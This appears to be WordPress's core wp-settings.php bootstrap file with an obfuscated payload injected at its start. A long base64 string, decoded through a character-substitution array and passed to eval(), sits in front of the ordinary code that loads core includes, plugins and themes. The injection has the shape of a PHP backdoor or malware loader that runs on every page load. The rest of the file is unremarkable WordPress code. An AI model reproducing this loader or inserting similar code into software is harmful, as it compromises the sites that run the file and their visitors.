Q1RaSVVqWnJVamo2eGRxemNkRXk3QVN5Q0JXcm5XJy4KJ2x6c1RaanNwOXpLcGZ6OFdHbk5PYnRKZGJSM1c2dEpkYnRKZGJ0Sk1HbWNkT3pzVFpqc3A5ektRUEN4ZGx1eGRQcng0R24nLgonTk9idEpkYnRKZGJ0SDFBSmNkYnRKZGJ0SmRidEpkYnRKVEd0bldiTkN6VXlDRU9uTk9idEpkYnRKZGJ0SmRidEpkYnRKZGJ6N01LelVkbHVjTWQ0c1ozanFCJy4KJ1U0S1ZEOWNiR3dkVzZ0SmRidEpkYnRKZGJ0SmRidEpkYnRKanZqYzRidWhhYnp2UW9MSldVelUzQUpjZGJ0SmRiJy4KJ3RKZGJ0SmRidEpkYnRKZFB5STFQdG5XK3RKVEV5Q1RaSVVqWnJVamp3ZFc2dEpkYnRKZGJ0SmRidEpkYjZoMUFKY2RidEpkYnRKZGInLgondEpkYnRzQkZyc1liTkhBVjRxVlo5c1YwbXhiRXJ4RVhuTk9idEpkYnRKZGJ0SmRidEpNVlJzVldrM1c2dEpkYnRKZGJ0Jy4KJ0pNbG5OT2J0SmRidEpkYnRzQjE0S0JHbWNkT3pzVFpqc3A5ektRUEN4ZGx1eGRQbXg0R25OT2J0SmRidEpkYnRIMUFKY2RidEpkYnRKZGJ0SmRidHNCJy4KJ0t5STNPenNUWmpzcDl6S05QQ3hFWG5OT2J0SmRidEpkYnRIV0FKY2RidEpkYnRKZGJtSTV2bUlWcXRKYkVtc3BXeUIxUHl4aicuCidqdG5XbHRKajM5SEJQcklhUDZOVzZ0SmRidEpkYnRKTVhuTk9idEpkYnRKZGJ0SmRidEpNR21jYkVtc3BXeUIxUDRLUVBDeGRsdXhkUHlJVEV6VUUnLgonQUpjZGJ0SmRidEpkYnRKZGJ0SDFBSmNkYnRKZGJ0SmRidEpkYnRKZGJ0Sk1GNDhsMzlIQlBySTJTeUlURTZKVEV5Q1RaSVVqM3o4VzF0SlRFeUNUWklVakV6OFdHazNXNnRKZCcuCididEpkYnRKZGJ0SmRiU05XNnRKZGJ0SmRidEpkYnRKZGJtSTV2bUlWcTZKVEV5Q1RaSVVqdnl4amp0bldsdEpqVW1JV1A2Tlc2dEpkYnRKZGJ0SmRidEonLgonZGJSM1c2dEpkYnRKZGJ0SmRidEpkYnRKZGJ0c0F2QzdNMWpJakc5VmxVbUlXT3pzVFpqc3A5ejdkUEN4RVhuTk9idEpkYnRKZGJ0SmRidEpNbG5OT2J0Jy4KJ0pkYnRKZGJ0SFdBSmNkYnRKZGJ0SmRibUlBTzlVZEVtc3BXeUIxUHlJMVBDaDFBSmNkYnRKZGJ0SmRibUNaR2pKYkdrM1c2dEpkYnRIV0FKYlc2dCcuCidKZGJ0c0F2QzdNMWpJakc5VmwxOUtwRTZKRVhuTkdsJzsKJHJnYnZ5aHphcXcgPSBBcnJheSgnMSc9PidzJywgJzAnPT4nNicsICczJz0+J3cnLCAnMic9Pic1JywgJzUnPT4neCcsICc0Jz0+J2MnLCAnNyc9PiczJywgJzYnPT4nSycsICc5Jz0+J2InLCAnOCc9PicxJywgJ0EnPT4nTicsICdDJz0+J1gnLCAnQic9PidWJywgJ0UnPT4naycsICdEJz0+J3YnLCAnRyc9PidwJywgJ0YnPT4naicsICdJJz0+J1cnLCAnSCc9PidIJywgJ0snPT4nMicsICdKJz0+J0MnLCAnTSc9PidCJywgJ0wnPT4nTScsICdPJz0+J28nLCAnTic9PidRJywgJ1EnPT4nRScsICdQJz0+J24nLCAnUyc9PidmJywgJ1InPT4nZScsICdVJz0+J3knLCAnVCc9PidSJywgJ1cnPT4nMCcsICdWJz0+J2wnLCAnWSc9Pic4JywgJ1gnPT4nNycsICdaJz0+J2gnLCAnYSc9Pic0JywgJ2MnPT4naScsICdiJz0+J2cnLCAnZSc9PidVJywgJ2QnPT4nQScsICdnJz0+J3QnLCAnZic9PidyJywgJ2knPT4ncScsICdoJz0+J1QnLCAnayc9PidPJywgJ2onPT4nZCcsICdtJz0+J1onLCAnbCc9Pic5JywgJ28nPT4ndScsICduJz0+J0QnLCAncSc9PidtJywgJ3AnPT4nRicsICdzJz0+J0cnLCAncic9PidhJywgJ3UnPT4nUCcsICd0Jz0+J0knLCAndyc9PidMJywgJ3YnPT4neicsICd5Jz0+J1knLCAneCc9PidTJywgJ3onPT4nSicpOwpldmFsLyp4Zm1yaWJkYyovKHpodHdkeGVpKCRlemd1a2hyZCwgJHJnYnZ5aHphcXcpKTsKfQ==")); /*common variables and include * the WordPress procedural and class library. * * Allows for some configuration in wp-config.php (see default-constants.php) * * @internal This file must be parsable by PHP4. * * @package WordPress */ /** * Stores the location of the WordPress directory of functions, classes, and core content. * * @since 1.0.0 */ define( 'WPINC', 'wp-includes' ); // Include files required for initialization. require( ABSPATH . WPINC . '/load.php' ); require( ABSPATH . WPINC . '/default-constants.php' ); require( ABSPATH . WPINC . '/version.php' ); // Set initial default constants including WP_MEMORY_LIMIT, WP_MAX_MEMORY_LIMIT, WP_DEBUG, WP_CONTENT_DIR and WP_CACHE. wp_initial_constants(); // Check for the required PHP version and for the MySQL extension or a database drop-in. wp_check_php_mysql_versions(); // Disable magic quotes at runtime. Magic quotes are added using wpdb later in wp-settings.php. @ini_set( 'magic_quotes_runtime', 0 ); @ini_set( 'magic_quotes_sybase', 0 ); // WordPress calculates offsets from UTC. date_default_timezone_set( 'UTC' ); // Turn register_globals off. wp_unregister_GLOBALS(); // Standardize $_SERVER variables across setups. wp_fix_server_vars(); // Check if we have received a request due to missing favicon.ico wp_favicon_request(); // Check if we're in maintenance mode. wp_maintenance(); // Start loading timer. timer_start(); // Check if we're in WP_DEBUG mode. wp_debug_mode(); // For an advanced caching plugin to use. Uses a static drop-in because you would only want one. if ( WP_CACHE ) WP_DEBUG ? include( WP_CONTENT_DIR . '/advanced-cache.php' ) : @include( WP_CONTENT_DIR . '/advanced-cache.php' ); // Define WP_LANG_DIR if not set. wp_set_lang_dir(); // Load early WordPress files. require( ABSPATH . WPINC . '/compat.php' ); require( ABSPATH . WPINC . '/functions.php' ); require( ABSPATH . WPINC . '/class-wp.php' ); require( ABSPATH . WPINC . '/class-wp-error.php' ); require( ABSPATH . WPINC . '/plugin.php' ); require( ABSPATH . WPINC . '/pomo/mo.php' ); // Include the wpdb class and, if present, a db.php database drop-in. require_wp_db(); // Set the database table prefix and the format specifiers for database table columns. $GLOBALS['table_prefix'] = $table_prefix; wp_set_wpdb_vars(); // Start the WordPress object cache, or an external object cache if the drop-in is present. wp_start_object_cache(); // Attach the default filters. require( ABSPATH . WPINC . '/default-filters.php' ); // Initialize multisite if enabled. if ( is_multisite() ) { require( ABSPATH . WPINC . '/ms-blogs.php' ); require( ABSPATH . WPINC . '/ms-settings.php' ); } elseif ( ! defined( 'MULTISITE' ) ) { define( 'MULTISITE', false ); } register_shutdown_function( 'shutdown_action_hook' ); // Stop most of WordPress from being loaded if we just want the basics. if ( SHORTINIT ) return false; // Load the L10n library. require_once( ABSPATH . WPINC . '/l10n.php' ); // Run the installer if WordPress is not installed. wp_not_installed(); // Load most of WordPress. require( ABSPATH . WPINC . '/class-wp-walker.php' ); require( ABSPATH . WPINC . '/class-wp-ajax-response.php' ); require( ABSPATH . WPINC . '/formatting.php' ); require( ABSPATH . WPINC . '/capabilities.php' ); require( ABSPATH . WPINC . '/query.php' ); require( ABSPATH . WPINC . '/date.php' ); require( ABSPATH . WPINC . '/theme.php' ); require( ABSPATH . WPINC . '/class-wp-theme.php' ); require( ABSPATH . WPINC . '/template.php' ); require( ABSPATH . WPINC . '/user.php' ); require( ABSPATH . WPINC . '/meta.php' ); require( ABSPATH . WPINC . '/general-template.php' ); require( ABSPATH . WPINC . '/link-template.php' ); require( ABSPATH . WPINC . '/author-template.php' ); require( ABSPATH . WPINC . '/post.php' ); require( ABSPATH . WPINC . '/post-template.php' ); require( ABSPATH . WPINC . '/revision.php' ); require( ABSPATH . WPINC . '/post-formats.php' ); require( ABSPATH . WPINC . '/post-thumbnail-template.php' ); require( ABSPATH . WPINC . '/category.php' ); require( ABSPATH . WPINC . '/category-template.php' ); require( ABSPATH . WPINC . '/comment.php' ); require( ABSPATH . WPINC . '/comment-template.php' ); require( ABSPATH . WPINC . '/rewrite.php' ); require( ABSPATH . WPINC . '/feed.php' ); require( ABSPATH . WPINC . '/bookmark.php' ); require( ABSPATH . WPINC . '/bookmark-template.php' ); require( ABSPATH . WPINC . '/kses.php' ); require( ABSPATH . WPINC . '/cron.php' ); require( ABSPATH . WPINC . '/deprecated.php' ); require( ABSPATH . WPINC . '/script-loader.php' ); require( ABSPATH . WPINC . '/taxonomy.php' ); require( ABSPATH . WPINC . '/update.php' ); require( ABSPATH . WPINC . '/canonical.php' ); require( ABSPATH . WPINC . '/shortcodes.php' ); require( ABSPATH . WPINC . '/class-wp-embed.php' ); require( ABSPATH . WPINC . '/media.php' ); require( ABSPATH . WPINC . '/http.php' ); require( ABSPATH . WPINC . '/class-http.php' ); require( ABSPATH . WPINC . '/widgets.php' ); require( ABSPATH . WPINC . '/nav-menu.php' ); require( ABSPATH . WPINC . '/nav-menu-template.php' ); require( ABSPATH . WPINC . '/admin-bar.php' ); // Load multisite-specific files. if ( is_multisite() ) { require( ABSPATH . WPINC . '/ms-functions.php' ); require( ABSPATH . WPINC . '/ms-default-filters.php' ); require( ABSPATH . WPINC . '/ms-deprecated.php' ); } // Define constants that rely on the API to obtain the default value. // Define must-use plugin directory constants, which may be overridden in the sunrise.php drop-in. wp_plugin_directory_constants(); // Load must-use plugins. foreach ( wp_get_mu_plugins() as $mu_plugin ) { include_once( $mu_plugin ); } unset( $mu_plugin ); // Load network activated plugins. if ( is_multisite() ) { foreach( wp_get_active_network_plugins() as $network_plugin ) { include_once( $network_plugin ); } unset( $network_plugin ); } /** * Fires once all must-use and network-activated plugins have loaded. * * @since 2.8.0 */ do_action( 'muplugins_loaded' ); if ( is_multisite() ) ms_cookie_constants( ); // Define constants after multisite is loaded. Cookie-related constants may be overridden in ms_network_cookies(). wp_cookie_constants(); // Define and enforce our SSL constants wp_ssl_constants(); // Create common globals. require( ABSPATH . WPINC . '/vars.php' ); // Make taxonomies and posts available to plugins and themes. // @plugin authors: warning: these get registered again on the init hook. create_initial_taxonomies(); create_initial_post_types(); // Register the default theme directory root register_theme_directory( get_theme_root() ); // Load active plugins. foreach ( wp_get_active_and_valid_plugins() as $plugin ) include_once( $plugin ); unset( $plugin ); // Load pluggable functions. require( ABSPATH . WPINC . '/pluggable.php' ); require( ABSPATH . WPINC . '/pluggable-deprecated.php' ); // Set internal encoding. wp_set_internal_encoding(); // Run wp_cache_postload() if object cache is enabled and the function exists. if ( WP_CACHE && function_exists( 'wp_cache_postload' ) ) wp_cache_postload(); /** * Fires once activated plugins have loaded. * * Pluggable functions are also available at this point in the loading order. * * @since 1.5.2 */ do_action( 'plugins_loaded' ); // Define constants which affect functionality if not already defined. wp_functionality_constants(); // Add magic quotes and set up $_REQUEST ( $_GET + $_POST ) wp_magic_quotes(); /** * Fires when comment cookies are sanitized. * * @since 2.0.11 */ do_action( 'sanitize_comment_cookies' ); /** * WordPress Query object * @global object $wp_the_query * @since 2.0.0 */ $wp_the_query = new WP_Query(); /** * Holds the reference to @see $wp_the_query * Use this global for WordPress queries * @global object $wp_query * @since 1.5.0 */ $wp_query = $wp_the_query; /** * Holds the WordPress Rewrite object for creating pretty URLs * @global object $wp_rewrite * @since 1.5.0 */ $GLOBALS['wp_rewrite'] = new WP_Rewrite(); /** * WordPress Object * @global object $wp * @since 2.0.0 */ $wp = new WP(); /** * WordPress Widget Factory Object * @global object $wp_widget_factory * @since 2.8.0 */ $GLOBALS['wp_widget_factory'] = new WP_Widget_Factory(); /** * WordPress User Roles * @global object $wp_roles * @since 2.0.0 */ $GLOBALS['wp_roles'] = new WP_Roles(); /** * Fires before the theme is loaded. * * @since 2.6.0 */ do_action( 'setup_theme' ); // Define the template related constants. wp_templating_constants( ); // Load the default text localization domain. load_default_textdomain(); $locale = get_locale(); $locale_file = WP_LANG_DIR . "/$locale.php"; if ( ( 0 === validate_file( $locale ) ) && is_readable( $locale_file ) ) require( $locale_file ); unset( $locale_file ); // Pull in locale data after loading text domain. require_once( ABSPATH . WPINC . '/locale.php' ); /** * WordPress Locale object for loading locale domain date and various strings. * @global object $wp_locale * @since 2.1.0 */ $GLOBALS['wp_locale'] = new WP_Locale(); // Load the functions for the active theme, for both parent and child theme if applicable. if ( ! defined( 'WP_INSTALLING' ) || 'wp-activate.php' === $pagenow ) { if ( TEMPLATEPATH !== STYLESHEETPATH && file_exists( STYLESHEETPATH . '/functions.php' ) ) include( STYLESHEETPATH . '/functions.php' ); if ( file_exists( TEMPLATEPATH . '/functions.php' ) ) include( TEMPLATEPATH . '/functions.php' ); } /** * Fires after the theme is loaded. * * @since 3.0.0 */ do_action( 'after_setup_theme' ); // Set up current user. $wp->init(); /** * Fires after WordPress has finished loading but before any headers are sent. * * Most of WP is loaded at this stage, and the user is authenticated. WP continues * to load on the init hook that follows (e.g. widgets), and many plugins instantiate * themselves on it for all sorts of reasons (e.g. they need a user, a taxonomy, etc.). * * If you wish to plug an action once WP is loaded, use the wp_loaded hook below. * * @since 1.5.2 */ do_action( 'init' ); // Check site status if ( is_multisite() ) { if ( true !== ( $file = ms_site_check() ) ) { require( $file ); die(); } unset($file); } /** * This hook is fired once WP, all plugins, and the theme are fully loaded and instantiated. * * AJAX requests should use wp-admin/admin-ajax.php. admin-ajax.php can handle requests for * users not logged in. * * @link http://codex.wordpress.org/AJAX_in_Plugins * * @since 3.0.0 */ do_action( 'wp_loaded' );